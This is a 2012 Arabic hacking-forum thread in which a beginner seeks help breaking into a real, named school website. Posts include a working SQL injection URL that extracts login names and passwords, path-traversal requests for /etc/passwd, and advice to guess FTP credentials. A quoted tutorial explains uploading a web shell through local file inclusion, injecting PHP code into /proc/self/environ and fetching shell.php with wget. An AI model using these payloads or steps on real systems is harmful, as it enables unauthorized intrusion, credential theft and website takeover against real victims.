التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب
تحديث الصفحة ارجوا العناكب الدخول
التعليمات التقويم مشاركات اليوم البحث

موضوع مغلق
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 06-27-2012, 01:23 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
Mezo Shams
:: حبيبي يا رسول الله ::
 
الصورة الرمزية Mezo Shams
 

 
 
إحصائية العضو






Mezo Shams غير متواجد حالياً

إرسال رسالة عبر MSN إلى Mezo Shams إرسال رسالة عبر Yahoo إلى Mezo Shams

 

 

إحصائية الترشيح

عدد النقاط : 10
Mezo Shams is on a distinguished road
افتراضي مجاب:

بسم الله الرحمن الرحيم انا عرفت يوزر الموقع
عايز اركب اندكس دلوقتى انا استخدمت البرنامج عشان اعرف لوحة التحكم
طلطلعى اية

دلوقتى انا حطيط الموقع فى البرنامج طلعلى اية
images
دة ملف وفية صور
وطلعلى اسم الموقع اتكيت علية طلعلى
index_defaultpage
index.html
lablec.html
main.php
submenu.php
رابط الموقع اهوة
http://szerver2.berzeviczy.sulinet.hu/
وبعدين كدة مسار لوحة التحكم اعرفة ازاى ولا اعمل اية

ارجوا الرد اصل مفيش شرح فى دورة الحقن خالص ارجوا حد يعملها فيديو من صاحب الدورة

Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC

التوقيع

http://www14.0zz0.com/2012/06/26/23/132386288.gif
مبتدا فى هكر المواقع
هكر بالحق sql
الميل:ikasnofa@hotmail.com

 

التعديل الأخير تم بواسطة mido868 ; 06-27-2012 الساعة 03:58 AM.

   

أفضل جواب - كتبه MaFia
جرب اكتب المعلومات يدوي مش كوبي وباست
اتاكد ان الجدول بتاع معلومات المدير صحيح
استعمل برنامج الهافج
الموقع به ثغره LfI افضل من Sql

اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Dr.abolalh
السلام عليكم ورحمة الله وبركاتة

كيفكم اخواني اتمنا الجميع بخير وصحة وعافية

حبيت اطرح هاذا الشرح لجل الافادة واتمنا انه يفديكم

المتطلبات
1. FireFox [download]
2. Tamper Data [download]
والموقع المراد التطبيق علية

انا جبت لكم كم موقع

http://pastie.org/private/7fbtucb1obczki7nk0xvxa


طيب نكمل

في البداية لازم نقدر نقرى proc/self/environ

اضغط هنا لترى الصورة بحجمها الطبيعى

بعد مايضبط الشغل نروح نشغل اداة تمبلر داتا

بعد ماتشتغل معنا الاداة
نروح لم



بعدها نروح لم الموقع حقنا ونعمل تحديث وراح تخرج لن هل النافذة



بعدها نروح للمربع هاذا





في هاذا المربع وضعنا
<?php phpinfo();?>


عشان نقرة phpinfo ونضمن الشغل

بعد ماتضغط اوك راح تخرج لك كم نافضة اضغط على الكل



بعدها ماتضغط وتتخطى

يفتح الموقع ويتم قراة phpinfo



ومنها راح نشوف ادوال والسيف مود وغيرها امر مهم قبل رفع الشل



<?exec('wget http://www.site.com/shell.txt -O shell.php');?>

هاذي هي الدالة exec الي راح نسخدمها لسحب الملف طبعن تقدر تغيرها اذا كانت ممنوعه
الى chmod
system

ومع شوي تطوير راح تضبط

بعدها

نروح نشوف

راح يفتح الموقع مثل ماكان

طيب لما تنتهي من الحقن مثال هل الموقع
http://www.site.com/index.php?page=/etc/passwd
نمسح
index.php?page=/etc/passwd

ونحط
http://www.site.com/shell.php


وباذن الله راح يتم الرفع الشل

اتمنا الشرح ماهو مكرر

اخوكم Dr.abolalh

قديم 06-27-2012, 04:01 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية mido868
 

 
 
إحصائية العضو






mido868 غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى mido868

 

 

إحصائية الترشيح

عدد النقاط : 16
mido868 is on a distinguished road
افتراضي رد: ارجوا العناكب الدخول

اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Mezo Shams
بسم الله الرحمن الرحيم انا عرفت يوزر الموقع
عايز اركب اندكس دلوقتى انا استخدمت البرنامج عشان اعرف لوحة التحكم
طلطلعى اية

دلوقتى انا حطيط الموقع فى البرنامج طلعلى اية
images
دة ملف وفية صور
وطلعلى اسم الموقع اتكيت علية طلعلى
index_defaultpage
index.html
lablec.html
main.php
submenu.php
رابط الموقع اهوة
http://szerver2.berzeviczy.sulinet.hu/
وبعدين كدة مسار لوحة التحكم اعرفة ازاى ولا اعمل اية

ارجوا الرد اصل مفيش شرح فى دورة الحقن خالص ارجوا حد يعملها فيديو من صاحب الدورة


اخى هل انت متأكد من هذا الرابط ،،
يرجى التأكد من الرابط الخاص بالموقع الذى حقنته او وضع المسار المصاب حتى نتأمد اذا كانت هناك لوحة تحكم لهذا الموقع ام لا
التوقيع

علمتنى الحياة ألا اكون كالذين كتموا العلم فمات معهم
إذا عندك إقتراح وتريد تنفيذه (لو عندك اقتراح ،اكتبه هنا)
http://www.vbspiders.com/vb/t67563.html
AUHT

 

   

قديم 06-27-2012, 04:41 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
Mezo Shams
:: حبيبي يا رسول الله ::
 
الصورة الرمزية Mezo Shams
 

 
 
إحصائية العضو






Mezo Shams غير متواجد حالياً

إرسال رسالة عبر MSN إلى Mezo Shams إرسال رسالة عبر Yahoo إلى Mezo Shams

 

 

إحصائية الترشيح

عدد النقاط : 10
Mezo Shams is on a distinguished road
افتراضي رد: ارجوا العناكب الدخول

رابط اهوة اخى

http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT concat(login_name,0x3a,passwd),2,3,4,5,6,7,8+from+ users--

ماشى اخش الرابط اهوة قولى اعمل اية بقى احط اية فى البرنامج ولما احطة هيطلعلى اية عشان بس اتعلم

التوقيع

http://www14.0zz0.com/2012/06/26/23/132386288.gif
مبتدا فى هكر المواقع
هكر بالحق sql
الميل:ikasnofa@hotmail.com

 

   

قديم 06-27-2012, 04:49 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية خالد سعودي
 

 
 
إحصائية العضو








خالد سعودي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
خالد سعودي is on a distinguished road
افتراضي رد: ارجوا العناكب الدخول

http://szerver2.berzeviczy.sulinet.hu/icons/
http://szerver2.berzeviczy.sulinet.h.../src/login.php
http://szerver2.berzeviczy.sulinet.h...configtest.php
http://szerver2.berzeviczy.sulinet.h.../etc/passwd%00
انا محقنت الموقع ماني فاضي حقن انت حقن بشكل جيد
هذا اقدر افيدك فيه
بحث عن في الموقع ممكن يكون دخوله الادمن نفس الاعضاء تري ماتصفحت الموقع بشكل جيد عندك ثغرة خمن على الفتي بي ابحث عن الايميل ذكانت حقنت الموقع موجود دخولة
فمان الرحمن
اختراق موفق

   

قديم 06-27-2012, 05:22 AM   رقم المشاركة : 5 (permalink)
معلومات العضو
Mezo Shams
:: حبيبي يا رسول الله ::
 
الصورة الرمزية Mezo Shams
 

 
 
إحصائية العضو






Mezo Shams غير متواجد حالياً

إرسال رسالة عبر MSN إلى Mezo Shams إرسال رسالة عبر Yahoo إلى Mezo Shams

 

 

إحصائية الترشيح

عدد النقاط : 10
Mezo Shams is on a distinguished road
افتراضي رد: ارجوا العناكب الدخول

اولا انا اتعلمت دورة الحقن ازاى معرفشى ويقف ادامى المهم انا دلوقتى الى انا عملتوا
اكنى معملتهوش اصل الاميل والباص مو يفتح فى لوحة التحكم وانا دلوقتى اعمل اية
كدة انا نتجتى صفر فى %
بس الى انا عرفتة ان الاصدار 5
ما لية تخمين الى لية اصدار4
والموقع دة اصدار 5
ممكن تقولى ازاى لما اخترق موقع اتاكد انو الباص يفتح اما لا بظبط هوة الاسم والباص الى انا كتبة غلط

التوقيع

http://www14.0zz0.com/2012/06/26/23/132386288.gif
مبتدا فى هكر المواقع
هكر بالحق sql
الميل:ikasnofa@hotmail.com

 

   

قديم 06-27-2012, 05:36 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية خالد سعودي
 

 
 
إحصائية العضو








خالد سعودي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
خالد سعودي is on a distinguished road
افتراضي رد: ارجوا العناكب الدخول

انت حقنت الموقع طلعت الباس واليوز صح
انت بحث عن الايميل صاحب الموقع في الجدوال اولا والثاني قولك خمن على الفتي بي يعني ../../../../../../../../../../etc/passwd%00 هذا ثغرة غير sql
موفق

   

قديم 06-27-2012, 11:56 AM   رقم المشاركة : 7 (permalink)
معلومات العضو
MaFia
../Cody
 
الصورة الرمزية MaFia
 

 
 
إحصائية العضو








MaFia غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى MaFia

 

 

إحصائية الترشيح

عدد النقاط : 16
MaFia is on a distinguished road
افتراضي رد: ارجوا العناكب الدخول

جرب اكتب المعلومات يدوي مش كوبي وباست
اتاكد ان الجدول بتاع معلومات المدير صحيح
استعمل برنامج الهافج
الموقع به ثغره LfI افضل من Sql

اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Dr.abolalh
السلام عليكم ورحمة الله وبركاتة

كيفكم اخواني اتمنا الجميع بخير وصحة وعافية

حبيت اطرح هاذا الشرح لجل الافادة واتمنا انه يفديكم

المتطلبات
1. FireFox [download]
2. Tamper Data [download]
والموقع المراد التطبيق علية

انا جبت لكم كم موقع

http://pastie.org/private/7fbtucb1obczki7nk0xvxa


طيب نكمل

في البداية لازم نقدر نقرى proc/self/environ

اضغط هنا لترى الصورة بحجمها الطبيعى

بعد مايضبط الشغل نروح نشغل اداة تمبلر داتا

بعد ماتشتغل معنا الاداة
نروح لم



بعدها نروح لم الموقع حقنا ونعمل تحديث وراح تخرج لن هل النافذة



بعدها نروح للمربع هاذا





في هاذا المربع وضعنا
<?php phpinfo();?>


عشان نقرة phpinfo ونضمن الشغل

بعد ماتضغط اوك راح تخرج لك كم نافضة اضغط على الكل



بعدها ماتضغط وتتخطى

يفتح الموقع ويتم قراة phpinfo



ومنها راح نشوف ادوال والسيف مود وغيرها امر مهم قبل رفع الشل



<?exec('wget http://www.site.com/shell.txt -O shell.php');?>

هاذي هي الدالة exec الي راح نسخدمها لسحب الملف طبعن تقدر تغيرها اذا كانت ممنوعه
الى chmod
system

ومع شوي تطوير راح تضبط

بعدها

نروح نشوف

راح يفتح الموقع مثل ماكان

طيب لما تنتهي من الحقن مثال هل الموقع
http://www.site.com/index.php?page=/etc/passwd
نمسح
index.php?page=/etc/passwd

ونحط
http://www.site.com/shell.php


وباذن الله راح يتم الرفع الشل

اتمنا الشرح ماهو مكرر

اخوكم Dr.abolalh

التوقيع

"إن للناس وجها شريرا وآخر طيبا والذكاء هو التعامل مع الجزء الطيب

من كل إنسان تقابله في حياتك

 

   

موضوع مغلق

مواقع النشر (المفضلة)

« الموضوع السابق | الموضوع التالي »

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة
الانتقال السريع


الساعة الآن 05:25 PM

:: vBspiders.Com :: RSS Feeds - راسلـنا - :: vBspiders.Com :: - الأعلى

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0